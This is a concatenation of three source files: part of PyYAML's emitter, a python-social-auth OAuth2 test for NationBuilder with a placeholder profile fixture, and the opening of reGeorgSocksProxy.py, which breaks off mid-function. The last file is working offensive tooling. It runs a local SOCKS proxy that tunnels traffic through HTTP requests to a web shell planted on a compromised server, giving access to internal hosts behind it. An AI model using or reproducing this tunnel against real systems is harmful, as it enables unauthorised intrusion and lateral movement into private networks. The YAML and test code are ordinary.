if isinstance(self.event, NodeEvent) and self.event.anchor is not None:
if self.prepared_anchor is None:
self.prepared_anchor = self.prepare_anchor(self.event.anchor)
length += len(self.prepared_anchor)
if isinstance(self.event, (ScalarEvent, CollectionStartEvent)) \
and self.event.tag is not None:
if self.prepared_tag is None:
self.prepared_tag = self.prepare_tag(self.event.tag)
length += len(self.prepared_tag)
if isinstance(self.event, ScalarEvent):
if self.analysis is None:
self.analysis = self.analyze_scalar(self.event.value)
length += len(self.analysis.scalar)
return (length < 128 and (isinstance(self.event, AliasEvent)
or (isinstance(self.event, ScalarEvent)
and not self.analysis.empty and not self.analysis.multiline)
or self.check_empty_sequence() or self.check_empty_mapping()))
# Anchor, Tag, and Scalar processors.
def process_anchor(self, indicator):
if self.event.anchor is None:
self.prepared_anchor = None
return
if self.prepared_anchor is None:
self.prepared_anchor = self.prepare_anchor(self.event.anchor)
if self.prepared_anchor:
self.write_indicator(indicator+self.prepared_anchor, True)
self.prepared_anchor = None
def process_tag(self):
tag = self.event.tag
if isinstance(self.event, ScalarEvent):
if self.style is None:
self.style = self.choose_scalar_style()
if ((not self.canonical or tag is None) and
((self.style == '' and self.event.implicit[0])
or (self.style != '' and self.event.implicit[1]))):
self.prepared_tag = None
return
if self.event.implicit[0] and tag is None:
tag = u'!'
self.prepared_tag = None
else:
if (not self.canonical or tag is None) and self.event.implicit:
self.prepared_tag = None
return
if tag is None:
raise EmitterError("tag is not specified")
if self.prepared_tag is None:
self.prepared_tag = self.prepare_tag(tag)
if self.prepared_tag:
self.write_indicator(self.prepared_tag, True)
self.prepared_tag = None
def choose_scalar_style(self):
if self.analysis is None:
self.analysis = self.analyze_scalar(self.event.value)
if self.event.style == '"' or self.canonical:
return '"'
if not self.event.style and self.event.implicit[0]:
if (not (self.simple_key_context and
(self.analysis.empty or self.analysis.multiline))
and (self.flow_level and self.analysis.allow_flow_plain
or (not self.flow_level and self.analysis.allow_block_plain))):
return ''
if self.event.style and self.event.style in '|>':
if (not self.flow_level and not self.simple_key_context
and self.analysis.allow_block):
return self.event.style
if not self.event.style or self.event.style == '\'':
if (self.analysis.allow_single_quoted and
not (self.simple_key_context and self.analysis.multiline)):
return '\''
return '"'
def process_scalar(self):
if self.analysis is None:
self.analysis = self.analyze_scalar(self.event.value)
if self.style is None:
self.style = self.choose_scalar_style()
split = (not self.simple_key_context)
#if self.analysis.multiline and split \
# and (not self.style or self.style in '\'\"'):
# self.write_indent()
if self.style == '"':
self.write_double_quoted(self.analysis.scalar, split)
elif self.style == '\'':
self.write_single_quoted(self.analysis.scalar, split)
elif self.style == '>':
self.write_folded(self.analysis.scalar)
elif self.style == '|':
self.write_literal(self.analysis.scalar)
else:
self.write_plain(self.analysis.scalar, split)
self.analysis = None
self.style = None
# Analyzers.
def prepare_version(self, version):
major, minor = version
if major != 1:
raise EmitterError("unsupported YAML version: %d.%d" % (major, minor))
return u'%d.%d' % (major, minor)
def prepare_tag_handle(self, handle):
if not handle:
raise EmitterError("tag handle must not be empty")
if handle[0] != u'!' or handle[-1] != u'!':
raise EmitterError("tag handle must start and end with '!': %r"
% (handle.encode('utf-8')))
for ch in handle[1:-1]:
if not (u'0' <= ch <= u'9' or u'A' <= ch <= u'Z' or u'a' <= ch <= u'z' \
or ch in u'-_'):
raise EmitterError("invalid character %r in the tag handle: %r"
% (ch.encode('utf-8'), handle.encode('utf-8')))
return handle
def prepare_tag_prefix(self, prefix):
if not prefix:
raise EmitterError("tag prefix must not be empty")
chunks = []
start = end = 0
if prefix[0] == u'!':
end = 1
while end < len(prefix):
ch = prefix[end]
if u'0' <= ch <= u'9' or u'A' <= ch <= u'Z' or u'a' <= ch <= u'z' \
or ch in u'-;/?!:@&=+$,_.~*\'()[]':
end += 1
else:
if start < end:
chunks.append(prefix[start:end])
start = end = end+1
data = ch.encode('utf-8')
for ch in data:
chunks.append(u'%%%02X' % ord(ch))
if start < end:
chunks.append(prefix[start:end])
return u''.join(chunks)
def prepare_tag(self, tag):
if not tag:
raise EmitterError("tag must not be empty")
if tag == u'!':
return tag
handle = None
suffix = tag
prefixes = self.tag_prefixes.keys()
prefixes.sort()
for prefix in prefixes:
if tag.startswith(prefix) \
and (prefix == u'!' or len(prefix) < len(tag)):
handle = self.tag_prefixes[prefix]
suffix = tag[len(prefix):]
chunks = []
start = end = 0
while end < len(suffix):
ch = suffix[end]
if u'0' <= ch <= u'9' or u'A' <= ch <= u'Z' or u'a' <= ch <= u'z' \
or ch in u'-;/?:@&=+$,_.~*\'()[]' \
or (ch == u'!' and handle != u'!'):
end += 1
else:
if start < end:
chunks.append(suffix[start:end])
start = end = end+1
data = ch.encode('utf-8')
for ch in data:
chunks.append(u'%%%02X' % ord(ch))
if start < end:
chunks.append(suffix[start:end])
suffix_text = u''.join(chunks)
if handle:
return u'%s%s' % (handle, suffix_text)
else:
return u'!<%s>' % suffix_text
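    # For example, with the default prefixes, prepare_tag maps
    # u'tag:yaml.org,2002:str' to u'!!str', while an unmatched tag such as
    # u'tag:example.com,2014:foo' becomes u'!<tag:example.com,2014:foo>'.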
def prepare_anchor(self, anchor):
if not anchor:
raise EmitterError("anchor must not be empty")
for ch in anchor:
if not (u'0' <= ch <= u'9' or u'A' <= ch <= u'Z' or u'a' <= ch <= u'z' \
or ch in u'-_'):
raise EmitterError("invalid character %r in the anchor: %r"
% (ch.encode('utf-8'), anchor.encode('utf-8')))
return anchor
def analyze_scalar(self, scalar):
# Empty scalar is a special case.
if not scalar:
return ScalarAnalysis(scalar=scalar, empty=True, multiline=False,
allow_flow_plain=False, allow_block_plain=True,
allow_single_quoted=True, allow_double_quoted=True,
allow_block=False)
# Indicators and special characters.
block_indicators = False
flow_indicators = False
line_breaks = False
special_characters = False
# Important whitespace combinations.
leading_space = False
leading_break = False
trailing_space = False
trailing_break = False
break_space = False
space_break = False
# Check document indicators.
if scalar.startswith(u'---') or scalar.startswith(u'...'):
block_indicators = True
flow_indicators = True
# First character or preceded by a whitespace.
preceeded_by_whitespace = True
# Last character or followed by a whitespace.
followed_by_whitespace = (len(scalar) == 1 or
scalar[1] in u'\0 \t\r\n\x85\u2028\u2029')
# The previous character is a space.
previous_space = False
# The previous character is a break.
previous_break = False
index = 0
while index < len(scalar):
ch = scalar[index]
# Check for indicators.
if index == 0:
# Leading indicators are special characters.
if ch in u'#,[]{}&*!|>\'\"%@`':
flow_indicators = True
block_indicators = True
if ch in u'?:':
flow_indicators = True
if followed_by_whitespace:
block_indicators = True
if ch == u'-' and followed_by_whitespace:
flow_indicators = True
block_indicators = True
else:
                # Some indicators are forbidden within a scalar as well.
if ch in u',?[]{}':
flow_indicators = True
if ch == u':':
flow_indicators = True
if followed_by_whitespace:
block_indicators = True
if ch == u'#' and preceeded_by_whitespace:
flow_indicators = True
block_indicators = True
# Check for line breaks, special, and unicode characters.
if ch in u'\n\x85\u2028\u2029':
line_breaks = True
if not (ch == u'\n' or u'\x20' <= ch <= u'\x7E'):
if (ch == u'\x85' or u'\xA0' <= ch <= u'\uD7FF'
or u'\uE000' <= ch <= u'\uFFFD') and ch != u'\uFEFF':
                    unicode_characters = True  # recorded here but never read in this method
if not self.allow_unicode:
special_characters = True
else:
special_characters = True
# Detect important whitespace combinations.
if ch == u' ':
if index == 0:
leading_space = True
if index == len(scalar)-1:
trailing_space = True
if previous_break:
break_space = True
previous_space = True
previous_break = False
elif ch in u'\n\x85\u2028\u2029':
if index == 0:
leading_break = True
if index == len(scalar)-1:
trailing_break = True
if previous_space:
space_break = True
previous_space = False
previous_break = True
else:
previous_space = False
previous_break = False
# Prepare for the next character.
index += 1
preceeded_by_whitespace = (ch in u'\0 \t\r\n\x85\u2028\u2029')
followed_by_whitespace = (index+1 >= len(scalar) or
scalar[index+1] in u'\0 \t\r\n\x85\u2028\u2029')
# Let's decide what styles are allowed.
allow_flow_plain = True
allow_block_plain = True
allow_single_quoted = True
allow_double_quoted = True
allow_block = True
# Leading and trailing whitespaces are bad for plain scalars.
if (leading_space or leading_break
or trailing_space or trailing_break):
allow_flow_plain = allow_block_plain = False
# We do not permit trailing spaces for block scalars.
if trailing_space:
allow_block = False
# Spaces at the beginning of a new line are only acceptable for block
# scalars.
if break_space:
allow_flow_plain = allow_block_plain = allow_single_quoted = False
        # Spaces followed by breaks, as well as special characters, are only
        # allowed for double-quoted scalars.
if space_break or special_characters:
allow_flow_plain = allow_block_plain = \
allow_single_quoted = allow_block = False
# Although the plain scalar writer supports breaks, we never emit
# multiline plain scalars.
if line_breaks:
allow_flow_plain = allow_block_plain = False
# Flow indicators are forbidden for flow plain scalars.
if flow_indicators:
allow_flow_plain = False
# Block indicators are forbidden for block plain scalars.
if block_indicators:
allow_block_plain = False
return ScalarAnalysis(scalar=scalar,
empty=False, multiline=line_breaks,
allow_flow_plain=allow_flow_plain,
allow_block_plain=allow_block_plain,
allow_single_quoted=allow_single_quoted,
allow_double_quoted=allow_double_quoted,
allow_block=allow_block)
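    # A few example analyses (a sketch): u'hello' permits every style;
    # u' hello' (leading space) forbids both plain forms; u'one\ntwo' is
    # multiline, so it will never be written as a plain scalar; and a scalar
    # containing u'\x07' counts as special and is only representable
    # double-quoted.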
# Writers.
def flush_stream(self):
if hasattr(self.stream, 'flush'):
self.stream.flush()
def write_stream_start(self):
# Write BOM if needed.
if self.encoding and self.encoding.startswith('utf-16'):
self.stream.write(u'\uFEFF'.encode(self.encoding))
def write_stream_end(self):
self.flush_stream()
def write_indicator(self, indicator, need_whitespace,
whitespace=False, indention=False):
if self.whitespace or not need_whitespace:
data = indicator
else:
data = u' '+indicator
self.whitespace = whitespace
self.indention = self.indention and indention
self.column += len(data)
self.open_ended = False
if self.encoding:
data = data.encode(self.encoding)
self.stream.write(data)
def write_indent(self):
indent = self.indent or 0
if not self.indention or self.column > indent \
or (self.column == indent and not self.whitespace):
self.write_line_break()
if self.column < indent:
self.whitespace = True
data = u' '*(indent-self.column)
self.column = indent
if self.encoding:
data = data.encode(self.encoding)
self.stream.write(data)
def write_line_break(self, data=None):
if data is None:
data = self.best_line_break
self.whitespace = True
self.indention = True
self.line += 1
self.column = 0
if self.encoding:
data = data.encode(self.encoding)
self.stream.write(data)
def write_version_directive(self, version_text):
data = u'%%YAML %s' % version_text
if self.encoding:
data = data.encode(self.encoding)
self.stream.write(data)
self.write_line_break()
def write_tag_directive(self, handle_text, prefix_text):
data = u'%%TAG %s %s' % (handle_text, prefix_text)
if self.encoding:
data = data.encode(self.encoding)
self.stream.write(data)
self.write_line_break()
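    # Example directive output: a document with version (1, 1) and tags
    # {u'!e!': u'tag:example.com,2014:'} begins with
    #   %YAML 1.1
    #   %TAG !e! tag:example.com,2014:
    # followed by an explicit '---' start indicator.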
# Scalar streams.
def write_single_quoted(self, text, split=True):
self.write_indicator(u'\'', True)
spaces = False
breaks = False
start = end = 0
while end <= len(text):
ch = None
if end < len(text):
ch = text[end]
if spaces:
if ch is None or ch != u' ':
if start+1 == end and self.column > self.best_width and split \
and start != 0 and end != len(text):
self.write_indent()
else:
data = text[start:end]
self.column += len(data)
if self.encoding:
data = data.encode(self.encoding)
self.stream.write(data)
start = end
elif breaks:
if ch is None or ch not in u'\n\x85\u2028\u2029':
if text[start] == u'\n':
self.write_line_break()
for br in text[start:end]:
if br == u'\n':
self.write_line_break()
else:
self.write_line_break(br)
self.write_indent()
start = end
else:
if ch is None or ch in u' \n\x85\u2028\u2029' or ch == u'\'':
if start < end:
data = text[start:end]
self.column += len(data)
if self.encoding:
data = data.encode(self.encoding)
self.stream.write(data)
start = end
if ch == u'\'':
data = u'\'\''
self.column += 2
if self.encoding:
data = data.encode(self.encoding)
self.stream.write(data)
start = end + 1
if ch is not None:
spaces = (ch == u' ')
breaks = (ch in u'\n\x85\u2028\u2029')
end += 1
self.write_indicator(u'\'', False)
ESCAPE_REPLACEMENTS = {
u'\0': u'0',
u'\x07': u'a',
u'\x08': u'b',
u'\x09': u't',
u'\x0A': u'n',
u'\x0B': u'v',
u'\x0C': u'f',
u'\x0D': u'r',
u'\x1B': u'e',
u'\"': u'\"',
u'\\': u'\\',
u'\x85': u'N',
u'\xA0': u'_',
u'\u2028': u'L',
u'\u2029': u'P',
}
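    # Example: write_double_quoted below turns u'\t' into the two-character
    # escape u'\\t' via this table, and u'\u2028' into u'\\L'; characters with
    # no short form fall back to \xXX, \uXXXX or \UXXXXXXXX escapes.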
def write_double_quoted(self, text, split=True):
self.write_indicator(u'"', True)
start = end = 0
while end <= len(text):
ch = None
if end < len(text):
ch = text[end]
if ch is None or ch in u'"\\\x85\u2028\u2029\uFEFF' \
or not (u'\x20' <= ch <= u'\x7E'
or (self.allow_unicode
and (u'\xA0' <= ch <= u'\uD7FF'
or u'\uE000' <= ch <= u'\uFFFD'))):
if start < end:
data = text[start:end]
self.column += len(data)
if self.encoding:
data = data.encode(self.encoding)
self.stream.write(data)
start = end
if ch is not None:
if ch in self.ESCAPE_REPLACEMENTS:
data = u'\\'+self.ESCAPE_REPLACEMENTS[ch]
elif ch <= u'\xFF':
data = u'\\x%02X' % ord(ch)
elif ch <= u'\uFFFF':
data = u'\\u%04X' % ord(ch)
else:
data = u'\\U%08X' % ord(ch)
self.column += len(data)
if self.encoding:
data = data.encode(self.encoding)
self.stream.write(data)
start = end+1
if 0 < end < len(text)-1 and (ch == u' ' or start >= end) \
and self.column+(end-start) > self.best_width and split:
data = text[start:end]+u'\\'
if start < end:
start = end
self.column += len(data)
if self.encoding:
data = data.encode(self.encoding)
self.stream.write(data)
self.write_indent()
self.whitespace = False
self.indention = False
if text[start] == u' ':
data = u'\\'
self.column += len(data)
if self.encoding:
data = data.encode(self.encoding)
self.stream.write(data)
end += 1
self.write_indicator(u'"', False)
def determine_block_hints(self, text):
hints = u''
if text:
if text[0] in u' \n\x85\u2028\u2029':
hints += unicode(self.best_indent)
if text[-1] not in u'\n\x85\u2028\u2029':
hints += u'-'
elif len(text) == 1 or text[-2] in u'\n\x85\u2028\u2029':
hints += u'+'
return hints
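    # Examples of the hints computed above: u'text\n' -> u'' (clip),
    # u'text' -> u'-' (strip, no final break), u'text\n\n' -> u'+' (keep),
    # and u' text\n' -> u'2' with the default indent, because a leading
    # space forces an explicit indentation indicator.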
def write_folded(self, text):
hints = self.determine_block_hints(text)
self.write_indicator(u'>'+hints, True)
if hints[-1:] == u'+':
self.open_ended = True
self.write_line_break()
leading_space = True
spaces = False
breaks = True
start = end = 0
while end <= len(text):
ch = None
if end < len(text):
ch = text[end]
if breaks:
if ch is None or ch not in u'\n\x85\u2028\u2029':
if not leading_space and ch is not None and ch != u' ' \
and text[start] == u'\n':
self.write_line_break()
leading_space = (ch == u' ')
for br in text[start:end]:
if br == u'\n':
self.write_line_break()
else:
self.write_line_break(br)
if ch is not None:
self.write_indent()
start = end
elif spaces:
if ch != u' ':
if start+1 == end and self.column > self.best_width:
self.write_indent()
else:
data = text[start:end]
self.column += len(data)
if self.encoding:
data = data.encode(self.encoding)
self.stream.write(data)
start = end
else:
if ch is None or ch in u' \n\x85\u2028\u2029':
data = text[start:end]
self.column += len(data)
if self.encoding:
data = data.encode(self.encoding)
self.stream.write(data)
if ch is None:
self.write_line_break()
start = end
if ch is not None:
breaks = (ch in u'\n\x85\u2028\u2029')
spaces = (ch == u' ')
end += 1
def write_literal(self, text):
hints = self.determine_block_hints(text)
self.write_indicator(u'|'+hints, True)
if hints[-1:] == u'+':
self.open_ended = True
self.write_line_break()
breaks = True
start = end = 0
while end <= len(text):
ch = None
if end < len(text):
ch = text[end]
if breaks:
if ch is None or ch not in u'\n\x85\u2028\u2029':
for br in text[start:end]:
if br == u'\n':
self.write_line_break()
else:
self.write_line_break(br)
if ch is not None:
self.write_indent()
start = end
else:
if ch is None or ch in u'\n\x85\u2028\u2029':
data = text[start:end]
if self.encoding:
data = data.encode(self.encoding)
self.stream.write(data)
if ch is None:
self.write_line_break()
start = end
if ch is not None:
breaks = (ch in u'\n\x85\u2028\u2029')
end += 1
def write_plain(self, text, split=True):
if self.root_context:
self.open_ended = True
if not text:
return
if not self.whitespace:
data = u' '
self.column += len(data)
if self.encoding:
data = data.encode(self.encoding)
self.stream.write(data)
self.whitespace = False
self.indention = False
spaces = False
breaks = False
start = end = 0
while end <= len(text):
ch = None
if end < len(text):
ch = text[end]
if spaces:
if ch != u' ':
if start+1 == end and self.column > self.best_width and split:
self.write_indent()
self.whitespace = False
self.indention = False
else:
data = text[start:end]
self.column += len(data)
if self.encoding:
data = data.encode(self.encoding)
self.stream.write(data)
start = end
elif breaks:
if ch not in u'\n\x85\u2028\u2029':
if text[start] == u'\n':
self.write_line_break()
for br in text[start:end]:
if br == u'\n':
self.write_line_break()
else:
self.write_line_break(br)
self.write_indent()
self.whitespace = False
self.indention = False
start = end
else:
if ch is None or ch in u' \n\x85\u2028\u2029':
data = text[start:end]
self.column += len(data)
if self.encoding:
data = data.encode(self.encoding)
self.stream.write(data)
start = end
if ch is not None:
spaces = (ch == u' ')
breaks = (ch in u'\n\x85\u2028\u2029')
end += 1
| apache-2.0 |
ononeor12/python-social-auth | social/tests/backends/test_nationbuilder.py | 77 | 8489 | import json
from social.tests.backends.oauth import OAuth2Test
class NationBuilderOAuth2Test(OAuth2Test):
backend_path = 'social.backends.nationbuilder.NationBuilderOAuth2'
user_data_url = 'https://foobar.nationbuilder.com/api/v1/people/me'
expected_username = 'foobar'
access_token_body = json.dumps({
'access_token': 'foobar',
'token_type': 'bearer',
'created_at': 1422937981,
'expires_in': 2592000
})
user_data_body = json.dumps({
'person': {
'twitter_followers_count': None,
'last_name': 'Bar',
'rule_violations_count': 0,
'linkedin_id': None,
'recruiter_id': None,
'membership_expires_at': None,
'donations_raised_count': 0,
'last_contacted_at': None,
'prefix': None,
'profile_content_html': None,
'email4': None,
'email2': None,
'availability': None,
'occupation': None,
'user_submitted_address': None,
'could_vote_status': None,
'state_upper_district': None,
'salesforce_id': None,
'van_id': None,
'phone_time': None,
'profile_content': None,
'auto_import_id': None,
'parent_id': None,
'email4_is_bad': False,
'twitter_updated_at': None,
'email3_is_bad': False,
'bio': None,
'party_member': None,
'unsubscribed_at': None,
'fax_number': None,
'last_contacted_by': None,
'active_customer_expires_at': None,
'federal_donotcall': False,
'warnings_count': 0,
'first_supporter_at': '2015-02-02T19:30:28-08:00',
'previous_party': None,
'donations_raised_amount_this_cycle_in_cents': 0,
'call_status_name': None,
'marital_status': None,
'facebook_updated_at': None,
'donations_count': 0,
'note_updated_at': None,
'closed_invoices_count': None,
'profile_headline': None,
'fire_district': None,
'mobile_normalized': None,
'import_id': None,
'last_call_id': None,
'donations_raised_amount_in_cents': 0,
'facebook_address': None,
'is_profile_private': False,
'last_rule_violation_at': None,
'sex': None,
'full_name': 'Foo Bar',
'last_donated_at': None,
'donations_pledged_amount_in_cents': 0,
'primary_email_id': 1,
'media_market_name': None,
'capital_amount_in_cents': 500,
'datatrust_id': None,
'precinct_code': None,
'email3': None,
'religion': None,
'first_prospect_at': None,
'judicial_district': None,
'donations_count_this_cycle': 0,
'work_address': None,
'is_twitter_follower': False,
'email1': 'foobar@gmail.com',
'email': 'foobar@gmail.com',
'contact_status_name': None,
'mobile_opt_in': True,
'twitter_description': None,
'parent': None,
'tags': [],
'first_volunteer_at': None,
'inferred_support_level': None,
'banned_at': None,
'first_invoice_at': None,
'donations_raised_count_this_cycle': 0,
'is_donor': False,
'twitter_location': None,
'email1_is_bad': False,
'legal_name': None,
'language': None,
'registered_at': None,
'call_status_id': None,
'last_invoice_at': None,
'school_sub_district': None,
'village_district': None,
'twitter_name': None,
'membership_started_at': None,
'subnations': [],
'meetup_address': None,
'author_id': None,
'registered_address': None,
'external_id': None,
'twitter_login': None,
'inferred_party': None,
'spent_capital_amount_in_cents': 0,
'suffix': None,
'mailing_address': None,
'is_leaderboardable': True,
'twitter_website': None,
'nbec_guid': None,
'city_district': None,
'church': None,
'is_profile_searchable': True,
'employer': None,
'is_fundraiser': False,
'email_opt_in': True,
'recruits_count': 0,
'email2_is_bad': False,
'county_district': None,
'recruiter': None,
'twitter_friends_count': None,
'facebook_username': None,
'active_customer_started_at': None,
'pf_strat_id': None,
'locale': None,
'twitter_address': None,
'is_supporter': True,
'do_not_call': False,
'profile_image_url_ssl': 'https://d3n8a8pro7vhmx.cloudfront.net'
'/assets/icons/buddy.png',
'invoices_amount_in_cents': None,
'username': None,
'donations_amount_in_cents': 0,
'is_volunteer': False,
'civicrm_id': None,
'supranational_district': None,
'precinct_name': None,
'invoice_payments_amount_in_cents': None,
'work_phone_number': None,
'phone': '213.394.4623',
'received_capital_amount_in_cents': 500,
'primary_address': None,
'is_possible_duplicate': False,
'invoice_payments_referred_amount_in_cents': None,
'donations_amount_this_cycle_in_cents': 0,
'priority_level': None,
'first_fundraised_at': None,
'phone_normalized': '2133944623',
'rnc_regid': None,
'twitter_id': None,
'birthdate': None,
'mobile': None,
'federal_district': None,
'donations_to_raise_amount_in_cents': 0,
'support_probability_score': None,
'invoices_count': None,
'nbec_precinct_code': None,
'website': None,
'closed_invoices_amount_in_cents': None,
'home_address': None,
'school_district': None,
'support_level': None,
'demo': None,
'children_count': 0,
'updated_at': '2015-02-02T19:30:28-08:00',
'membership_level_name': None,
'billing_address': None,
'is_ignore_donation_limits': False,
'signup_type': 0,
'precinct_id': None,
'rnc_id': None,
'id': 2,
'ethnicity': None,
'is_survey_question_private': False,
'middle_name': None,
'author': None,
'last_fundraised_at': None,
'state_file_id': None,
'note': None,
'submitted_address': None,
'support_level_changed_at': None,
'party': None,
'contact_status_id': None,
'outstanding_invoices_amount_in_cents': None,
'page_slug': None,
'outstanding_invoices_count': None,
'first_recruited_at': None,
'county_file_id': None,
'first_name': 'Foo',
'facebook_profile_url': None,
'city_sub_district': None,
'has_facebook': False,
'is_deceased': False,
'labour_region': None,
'state_lower_district': None,
'dw_id': None,
'created_at': '2015-02-02T19:30:28-08:00',
'is_prospect': False,
'priority_level_changed_at': None,
'is_mobile_bad': False,
'overdue_invoices_count': None,
'ngp_id': None,
'do_not_contact': False,
'first_donated_at': None,
'turnout_probability_score': None
},
'precinct': None
})
def test_login(self):
self.strategy.set_settings({
'SOCIAL_AUTH_NATIONBUILDER_SLUG': 'foobar'
})
self.do_login()
def test_partial_pipeline(self):
self.strategy.set_settings({
'SOCIAL_AUTH_NATIONBUILDER_SLUG': 'foobar'
})
self.do_partial_pipeline()
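    # The two tests above drive the generic OAuth2Test flow against the canned
    # token and profile bodies defined on this class. A sketch of running just
    # this module (assuming plain unittest discovery works for this suite):
    #   python -m unittest social.tests.backends.test_nationbuilder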
| bsd-3-clause |
xl7dev/WebShell | reGeorg-master/reGeorgSocksProxy.py | 1 | 16189 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import logging
import argparse
import signal
import sys
import atexit
import httplib
import urllib3
from threading import Thread
from urlparse import urlparse
from socket import *
from time import sleep
#import struct
# Constants
SOCKTIMEOUT = 5
RESENDTIMEOUT=300
VER="\x05"
METHOD="\x00"
SUCCESS="\x00"
SOCKFAIL="\x01"
NETWORKFAIL="\x02"
HOSTFAIL="\x04"
REFUSED="\x05"
TTLEXPIRED="\x06"
UNSUPPORTCMD="\x07"
ADDRTYPEUNSPPORT="\x08"
UNASSIGNED="\x09"
BASICCHECKSTRING = "Georg says, 'All seems fine'"
# Globals
READBUFSIZE = 1024
#Logging
RESET_SEQ = "\033[0m"
COLOR_SEQ = "\033[1;%dm"
BOLD_SEQ = "\033[1m"
BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE = range(8)
LEVEL = {"INFO" : logging.INFO,
"DEBUG" : logging.DEBUG,
}
logLevel = "INFO"
COLORS = {
'WARNING' : YELLOW,
'INFO' : WHITE,
'DEBUG' : BLUE,
'CRITICAL' : YELLOW,
'ERROR' : RED,
'RED' : RED,
'GREEN' : GREEN,
'YELLOW' : YELLOW,
'BLUE' : BLUE,
'MAGENTA' : MAGENTA,
'CYAN' : CYAN,
'WHITE' : WHITE,
}
def formatter_message(message, use_color = True):
if use_color:
message = message.replace("$RESET", RESET_SEQ).replace("$BOLD", BOLD_SEQ)
else:
message = message.replace("$RESET", "").replace("$BOLD", "")
return message
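# Illustrative example (sketch, not part of the original tool): the helper
# simply expands the two placeholders into ANSI escape sequences, e.g.
#   formatter_message("[$BOLD%(levelname)s$RESET] %(message)s")
#     -> "[\033[1m%(levelname)s\033[0m] %(message)s"
# and strips both markers entirely when use_color is False.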
class ColoredFormatter(logging.Formatter):
def __init__(self, msg, use_color = True):
logging.Formatter.__init__(self, msg)
self.use_color = use_color
def format(self, record):
levelname = record.levelname
if self.use_color and levelname in COLORS:
levelname_color = COLOR_SEQ % (30 + COLORS[levelname]) + levelname + RESET_SEQ
record.levelname = levelname_color
return logging.Formatter.format(self, record)
class ColoredLogger(logging.Logger):
def __init__(self, name):
FORMAT = "[$BOLD%(levelname)-18s$RESET] %(message)s"
COLOR_FORMAT = formatter_message(FORMAT, True)
logging.Logger.__init__(self, name, logLevel)
if (name == "transfer"):
COLOR_FORMAT = "\x1b[80D\x1b[1A\x1b[K%s" % COLOR_FORMAT
color_formatter = ColoredFormatter(COLOR_FORMAT)
console = logging.StreamHandler()
console.setFormatter(color_formatter)
self.addHandler(console)
return
logging.setLoggerClass(ColoredLogger)
log = logging.getLogger(__name__)
transferLog = logging.getLogger("transfer")
class SocksCmdNotImplemented(Exception):
pass
class SocksProtocolNotImplemented(Exception):
pass
class RemoteConnectionFailed(Exception):
pass
class session(Thread):
def __init__(self,pSocket,connectString):
Thread.__init__(self)
self.pSocket = pSocket
self.connectString = connectString
o = urlparse(connectString)
try:
self.httpPort = o.port
except:
if o.scheme == "https":
self.httpPort = 443
else:
self.httpPort = 80
self.httpScheme = o.scheme
self.httpHost = o.netloc.split(":")[0]
self.httpPath = o.path
self.cookie = None
if o.scheme == "http":
self.httpScheme = urllib3.HTTPConnectionPool
else:
self.httpScheme = urllib3.HTTPSConnectionPool
def parseSocks5(self,sock):
log.debug("SocksVersion5 detected")
nmethods,methods=(sock.recv(1),sock.recv(1))
sock.sendall(VER+METHOD)
ver=sock.recv(1)
if ver=="\x02": # this is a hack for proxychains
ver,cmd,rsv,atyp=(sock.recv(1),sock.recv(1),sock.recv(1),sock.recv(1))
else:
cmd,rsv,atyp=(sock.recv(1),sock.recv(1),sock.recv(1))
target = None
targetPort = None
if atyp=="\x01":# IPv4
# Reading 6 bytes for the IP and Port
target = sock.recv(4)
targetPort = sock.recv(2)
target =".".join([str(ord(i)) for i in target])
elif atyp=="\x03":# Hostname
targetLen = ord(sock.recv(1)) # hostname length (1 byte)
target = sock.recv(targetLen)
targetPort = sock.recv(2)
target = "".join([unichr(ord(i)) for i in target])
elif atyp=="\x04":# IPv6
target = sock.recv(16)
targetPort = sock.recv(2)
tmp_addr=[]
for i in xrange(len(target)/2):
tmp_addr.append(unichr(ord(target[2*i])*256+ord(target[2*i+1])))
target=":".join(tmp_addr)
targetPort = ord(targetPort[0])*256+ord(targetPort[1])
if cmd=="\x02":#BIND
raise SocksCmdNotImplemented("Socks5 - BIND not implemented")
elif cmd=="\x03":#UDP
raise SocksCmdNotImplemented("Socks5 - UDP not implemented")
elif cmd=="\x01":#CONNECT
serverIp = target
try:
serverIp = gethostbyname(target)
except:
log.error("oeps")
serverIp="".join([chr(int(i)) for i in serverIp.split(".")])
self.cookie = self.setupRemoteSession(target,targetPort)
if self.cookie:
sock.sendall(VER+SUCCESS+"\x00"+"\x01"+serverIp+chr(targetPort/256)+chr(targetPort%256))
return True
else:
sock.sendall(VER+REFUSED+"\x00"+"\x01"+serverIp+chr(targetPort/256)+chr(targetPort%256))
raise RemoteConnectionFailed("[%s:%d] Remote failed" %(target,targetPort))
raise SocksCmdNotImplemented("Socks5 - Unknown CMD")
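# --- Illustrative byte layout (sketch; inferred from parseSocks5 above) ---
# A SOCKS5 CONNECT to a hostname target looks like this on the wire:
#   client -> "\x05" + nmethods + methods              greeting (version 5)
#   server -> "\x05\x00"                               VER + METHOD, no authentication
#   client -> "\x05\x01\x00\x03"                       version, CONNECT, reserved, ATYP=hostname
#             + chr(len(host)) + host                  length-prefixed hostname
#             + chr(port / 256) + chr(port % 256)      port, big-endian
#   server -> VER + SUCCESS + "\x00\x01" + ip + port   reply as built in the code above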
def parseSocks4(self,sock):
log.debug("SocksVersion4 detected")
cmd=sock.recv(1)
if cmd == "\x01": # Connect
targetPort = sock.recv(2)
targetPort = ord(targetPort[0])*256+ord(targetPort[1])
target = sock.recv(4)
sock.recv(1)
target =".".join([str(ord(i)) for i in target])
serverIp = target
try:
serverIp = gethostbyname(target)
except:
log.error("oeps")
serverIp="".join([chr(int(i)) for i in serverIp.split(".")])
self.cookie = self.setupRemoteSession(target,targetPort)
if self.cookie:
sock.sendall(chr(0)+chr(90)+serverIp+chr(targetPort/256)+chr(targetPort%256))
return True
else:
sock.sendall("\x00"+"\x91"+serverIp+chr(targetPort/256)+chr(targetPort%256))
raise RemoteConnectionFailed("Remote connection failed")
else:
raise SocksProtocolNotImplemented("Socks4 - Command [%d] Not implemented" % ord(cmd))
def handleSocks(self,sock):
# This is where we setup the socks connection
ver = sock.recv(1)
if ver == "\x05":
return self.parseSocks5(sock)
elif ver == "\x04":
return self.parseSocks4(sock)
def setupRemoteSession(self,target,port):
headers = {"X-CMD": "CONNECT", "X-TARGET": target, "X-PORT": port}
self.target = target
self.port = port
cookie = None
conn = self.httpScheme(host=self.httpHost, port=self.httpPort)
#response = conn.request("POST", self.httpPath, params, headers)
response = conn.urlopen('POST', self.connectString+"?cmd=connect&target=%s&port=%d" % (target,port), headers=headers, body="")
if response.status == 200:
status = response.getheader("x-status")
if status == "OK":
cookie = response.getheader("set-cookie")
